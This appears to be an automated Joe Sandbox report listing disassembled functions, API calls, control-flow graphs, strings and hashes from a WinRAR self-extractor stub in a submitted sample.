                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                  • API String ID: 3049964643-3743209390
                                                                                                                                  • Opcode ID: a1fce3d24e38d672d3cdc7d33da1ae137e31c1c52626caf187d3f597eac771c0
                                                                                                                                  • Instruction ID: 84b70e07a43f73baea511c957dcf91a831c129095d29c487a79593de924e256f
                                                                                                                                  • Opcode Fuzzy Hash: a1fce3d24e38d672d3cdc7d33da1ae137e31c1c52626caf187d3f597eac771c0
                                                                                                                                  • Instruction Fuzzy Hash: B361E271904355AFD720ABB8DC49FBB3BACFB45704F00042AFA45D63A2EB789944C762
                                                                                                                                  Function 008BA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 812 8ba6c2-8ba6df FindResourceW 813 8ba7db 812->813 814 8ba6e5-8ba6f6 SizeofResource 812->814 815 8ba7dd-8ba7e1 813->815 814->813 816 8ba6fc-8ba70b LoadResource 814->816 816->813 817 8ba711-8ba71c LockResource 816->817 817->813 818 8ba722-8ba737 GlobalAlloc 817->818 819 8ba73d-8ba746 GlobalLock 818->819 820 8ba7d3-8ba7d9 818->820 821 8ba7cc-8ba7cd GlobalFree 819->821 822 8ba74c-8ba76a call 8c0320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 8ba76c-8ba78e call 8ba626 822->825 826 8ba7c5-8ba7c6 GlobalUnlock 822->826 825->826 831 8ba790-8ba798 825->831 826->821 832 8ba79a-8ba7ae GdipCreateHBITMAPFromBitmap 831->832 833 8ba7b3-8ba7c1 831->833 832->833 834 8ba7b0 832->834 833->826 834->833
                                                                                                                                  APIs
                                                                                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,008BB73D,00000066), ref: 008BA6D5
                                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA6EC
                                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA703
                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,008BB73D,00000066), ref: 008BA712
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,008BB73D,00000066), ref: 008BA72D
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 008BA73E
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 008BA762
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 008BA7C6
                                                                                                                                    • Part of subcall function 008BA626: GdipAlloc.GDIPLUS(00000010), ref: 008BA62C
                                                                                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 008BA7A7
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 008BA7CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                  • String ID: PNG
                                                                                                                                  • API String ID: 211097158-364855578
                                                                                                                                  • Opcode ID: ca7636f2ef298d4f81f1683838873f9afb051d2074b1640606928d16119f7ec5
                                                                                                                                  • Instruction ID: f687df765f8a948ca3d25b374418f9f86c658fa574a60caab4c08014b0efd205
                                                                                                                                  • Opcode Fuzzy Hash: ca7636f2ef298d4f81f1683838873f9afb051d2074b1640606928d16119f7ec5
                                                                                                                                  • Instruction Fuzzy Hash: 9C31C4B5605702AFCB149F21DC88D6B7BB9FF84761B000619F885D2321EF31DC44CA62
                                                                                                                                  Function 008AA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1029 8aa69b-8aa6bf call 8bec50 1032 8aa6c1-8aa6ce FindFirstFileW 1029->1032 1033 8aa727-8aa730 FindNextFileW 1029->1033 1034 8aa742-8aa7ff call 8b0602 call 8ac310 call 8b15da * 3 1032->1034 1036 8aa6d0-8aa6e2 call 8abb03 1032->1036 1033->1034 1035 8aa732-8aa740 GetLastError 1033->1035 1040 8aa804-8aa811 1034->1040 1037 8aa719-8aa722 1035->1037 1044 8aa6fe-8aa707 GetLastError 1036->1044 1045 8aa6e4-8aa6fc FindFirstFileW 1036->1045 1037->1040 1047 8aa709-8aa70c 1044->1047 1048 8aa717 1044->1048 1045->1034 1045->1044 1047->1048 1050 8aa70e-8aa711 1047->1050 1048->1037 1050->1048 1052 8aa713-8aa715 1050->1052 1052->1037
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6C4
                                                                                                                                    • Part of subcall function 008ABB03: _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6F2
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA6FE
                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,008AA592,000000FF,?,?), ref: 008AA728
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008AA592,000000FF,?,?), ref: 008AA734
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 42610566-0
                                                                                                                                  • Opcode ID: f5a0967624fa4024f78f4e66f862b2f3665e9403fc44361faac07dbbb04f9ccb
                                                                                                                                  • Instruction ID: d3ea637ac59eeb35208958b43c7f44ee1ce9132b9dc85680ecf9b43e14eecf03
                                                                                                                                  • Opcode Fuzzy Hash: f5a0967624fa4024f78f4e66f862b2f3665e9403fc44361faac07dbbb04f9ccb
                                                                                                                                  • Instruction Fuzzy Hash: C941B372900519ABDB29DF68CC88AEAB7B8FF49350F104296F55DE3610D7346E90CF91
                                                                                                                                  Function 008C7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,008C7DC4,00000000,008DC300,0000000C,008C7F1B,00000000,00000002,00000000), ref: 008C7E0F
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,008C7DC4,00000000,008DC300,0000000C,008C7F1B,00000000,00000002,00000000), ref: 008C7E16
                                                                                                                                  • ExitProcess.KERNEL32 ref: 008C7E28
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: ac9d3b5936e563c6c05ef08edd239d9e74623768ee0960a7cc5280ff70f1c55c
                                                                                                                                  • Instruction ID: 867abc2b84d9500626f3b8baa61c0e734225be68104bccc00b4946222f21a9a7
                                                                                                                                  • Opcode Fuzzy Hash: ac9d3b5936e563c6c05ef08edd239d9e74623768ee0960a7cc5280ff70f1c55c
                                                                                                                                  • Instruction Fuzzy Hash: 42E0B632005948ABCF516F64DD0AE4A7F7AFF50741F044559F819EA132CB36DE92CA91
                                                                                                                                  Function 008A848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: a38db101fbaf8c655fb1d45823125d2672646a44747ef26fcd82ca26cfee8792
                                                                                                                                  • Instruction ID: 299472ead34a31033b5fb438bc98378e9c079e448f587ccc2350777d2cb1c1ff
                                                                                                                                  • Opcode Fuzzy Hash: a38db101fbaf8c655fb1d45823125d2672646a44747ef26fcd82ca26cfee8792
                                                                                                                                  • Instruction Fuzzy Hash: 2282E570904145EEEF25DB64C895BFABBB9FF06300F0841B9E849DBA42DB345A85CB71
                                                                                                                                  Function 008BB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008BB7E5
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BB8D1
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB8EF
                                                                                                                                  • IsDialogMessageW.USER32(?,?), ref: 008BB902
                                                                                                                                  • TranslateMessage.USER32(?), ref: 008BB910
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 008BB91A
                                                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 008BB93D
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 008BB960
                                                                                                                                  • GetDlgItem.USER32(?,00000068), ref: 008BB983
                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008BB99E
                                                                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,008D35F4), ref: 008BB9B1
                                                                                                                                    • Part of subcall function 008BD453: _wcslen.LIBCMT ref: 008BD47D
                                                                                                                                  • SetFocus.USER32(00000000), ref: 008BB9B8
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBA24
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                    • Part of subcall function 008BD4D4: GetDlgItem.USER32(00000068,008FFCB8), ref: 008BD4E8
                                                                                                                                    • Part of subcall function 008BD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,008BAF07,00000001,?,?,008BB7B9,008D506C,008FFCB8,008FFCB8,00001000,00000000,00000000), ref: 008BD510
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008BD51B
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000C2,00000000,008D35F4), ref: 008BD529
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008BD53F
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008BD559
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008BD59D
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008BD5AB
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008BD5BA
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008BD5E1
                                                                                                                                    • Part of subcall function 008BD4D4: SendMessageW.USER32(00000000,000000C2,00000000,008D43F4), ref: 008BD5F0
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 008BBA68
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 008BBA90
                                                                                                                                  • GetTickCount.KERNEL32 ref: 008BBAAE
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBAC2
                                                                                                                                  • GetLastError.KERNEL32(?,00000011), ref: 008BBAF4
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 008BBB43
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBB7C
                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 008BBBD0
                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 008BBBEA
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 008BBC47
                                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 008BBC6F
                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 008BBCB9
                                                                                                                                  • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 008BBCE2
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008BBCEB
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBD1E
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BBD7D
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000065,008D35F4), ref: 008BBD94
                                                                                                                                  • GetDlgItem.USER32(?,00000065), ref: 008BBD9D
                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 008BBDAC
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008BBDBB
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BBE68
                                                                                                                                  • _wcslen.LIBCMT ref: 008BBEBE
                                                                                                                                  • _swprintf.LIBCMT ref: 008BBEE8
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 008BBF32
                                                                                                                                  • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 008BBF4C
                                                                                                                                  • GetDlgItem.USER32(?,00000068), ref: 008BBF55
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 008BBF6B
                                                                                                                                  • GetDlgItem.USER32(?,00000066), ref: 008BBF85
                                                                                                                                  • SetWindowTextW.USER32(00000000,008EA472), ref: 008BBFA7
                                                                                                                                  • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 008BC007
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BC01A
                                                                                                                                  • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 008BC0BD
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 008BC197
                                                                                                                                  • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 008BC1D9
                                                                                                                                    • Part of subcall function 008BC73F: __EH_prolog.LIBCMT ref: 008BC744
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008BC1FD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                  • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                  • API String ID: 3445078344-2238251102
                                                                                                                                  • Opcode ID: c2ce3f90a2b819a34176e70e0f9df4e2cf92379ef5d8fa1e823d0f6ae6e45526
                                                                                                                                  • Instruction ID: f8a1e1282cb55907b4ba7cfde6f166223b514557aa5568184bcd9bde010a96b7
                                                                                                                                  • Opcode Fuzzy Hash: c2ce3f90a2b819a34176e70e0f9df4e2cf92379ef5d8fa1e823d0f6ae6e45526
                                                                                                                                  • Instruction Fuzzy Hash: 0942D871944258BEEB219BB49C4AFFE3B7CFB02704F004155F645E62E2CBB49A44CB66
                                                                                                                                  Function 008B0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 268 8b0863-8b0886 call 8bec50 GetModuleHandleW 271 8b0888-8b089f GetProcAddress 268->271 272 8b08e7-8b0b48 268->272 275 8b08b9-8b08c9 GetProcAddress 271->275 276 8b08a1-8b08b7 271->276 273 8b0b4e-8b0b59 call 8c75fb 272->273 274 8b0c14-8b0c40 GetModuleFileNameW call 8ac29a call 8b0602 272->274 273->274 285 8b0b5f-8b0b8d GetModuleFileNameW CreateFileW 273->285 291 8b0c42-8b0c4e call 8ab146 274->291 279 8b08cb-8b08e0 275->279 280 8b08e5 275->280 276->275 279->280 280->272 288 8b0c08-8b0c0f CloseHandle 285->288 289 8b0b8f-8b0b9b SetFilePointer 285->289 288->274 289->288 292 8b0b9d-8b0bb9 ReadFile 289->292 297 8b0c7d-8b0ca4 call 8ac310 GetFileAttributesW 291->297 298 8b0c50-8b0c5b call 8b081b 291->298 292->288 294 8b0bbb-8b0be0 292->294 296 8b0bfd-8b0c06 call 8b0371 294->296 296->288 304 8b0be2-8b0bfc call 8b081b 296->304 306 8b0cae 297->306 307 8b0ca6-8b0caa 297->307 298->297 309 8b0c5d-8b0c7b CompareStringW 298->309 304->296 311 8b0cb0-8b0cb5 306->311 307->291 310 8b0cac 307->310 309->297 309->307 310->311 313 8b0cec-8b0cee 311->313 314 8b0cb7 311->314 316 8b0dfb-8b0e05 313->316 317 8b0cf4-8b0d0b call 8ac2e4 call 8ab146 313->317 315 8b0cb9-8b0ce0 call 8ac310 GetFileAttributesW 314->315 323 8b0cea 315->323 324 8b0ce2-8b0ce6 315->324 327 8b0d0d-8b0d6e call 8b081b * 2 call 8ae617 call 8a4092 call 8ae617 call 8ba7e4 317->327 328 8b0d73-8b0da6 call 8a4092 AllocConsole 317->328 323->313 324->315 326 8b0ce8 324->326 326->313 334 8b0df3-8b0df5 ExitProcess 327->334 333 8b0da8-8b0ded GetCurrentProcessId AttachConsole call 8c3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 008B087C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008B088E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008B08BF
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008B0B69
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B0B83
                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 008B0B93
                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,008D3C7C,00000000), ref: 008B0BB1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008B0C09
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008B0C1E
                                                                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,008D3C7C,?,00000000,?,00000800), ref: 008B0C72
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,008D3C7C,00000800,?,00000000,?,00000800), ref: 008B0C9C
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,008D3D44,00000800), ref: 008B0CD8
                                                                                                                                    • Part of subcall function 008B081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008B0836
                                                                                                                                    • Part of subcall function 008B081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008AF2D8,Crypt32.dll,00000000,008AF35C,?,?,008AF33E,?,?,?), ref: 008B0858
                                                                                                                                  • _swprintf.LIBCMT ref: 008B0D4A
                                                                                                                                  • _swprintf.LIBCMT ref: 008B0D96
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • AllocConsole.KERNEL32 ref: 008B0D9E
                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 008B0DA8
                                                                                                                                  • AttachConsole.KERNEL32(00000000), ref: 008B0DAF
                                                                                                                                  • _wcslen.LIBCMT ref: 008B0DC4
                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 008B0DD5
                                                                                                                                  • WriteConsoleW.KERNEL32(00000000), ref: 008B0DDC
                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 008B0DE7
                                                                                                                                  • FreeConsole.KERNEL32 ref: 008B0DED
                                                                                                                                  • ExitProcess.KERNEL32 ref: 008B0DF5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                  • API String ID: 1207345701-3298887752
                                                                                                                                  • Opcode ID: cbf81a1cd99b0892f42f02901f0bd94a9c26cd29b172bea6de893077da2983a7
                                                                                                                                  • Instruction ID: 4c5f7410feecd2297c1f164e107710d76b171a4efa1c6e59d64a605a240c1495
                                                                                                                                  • Opcode Fuzzy Hash: cbf81a1cd99b0892f42f02901f0bd94a9c26cd29b172bea6de893077da2983a7
                                                                                                                                  • Instruction Fuzzy Hash: 7DD140B1009784ABD7219F948849ADFBBE8FB85704F504A1EF295D6350DBB48A4CCF63
                                                                                                                                  Function 008BC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
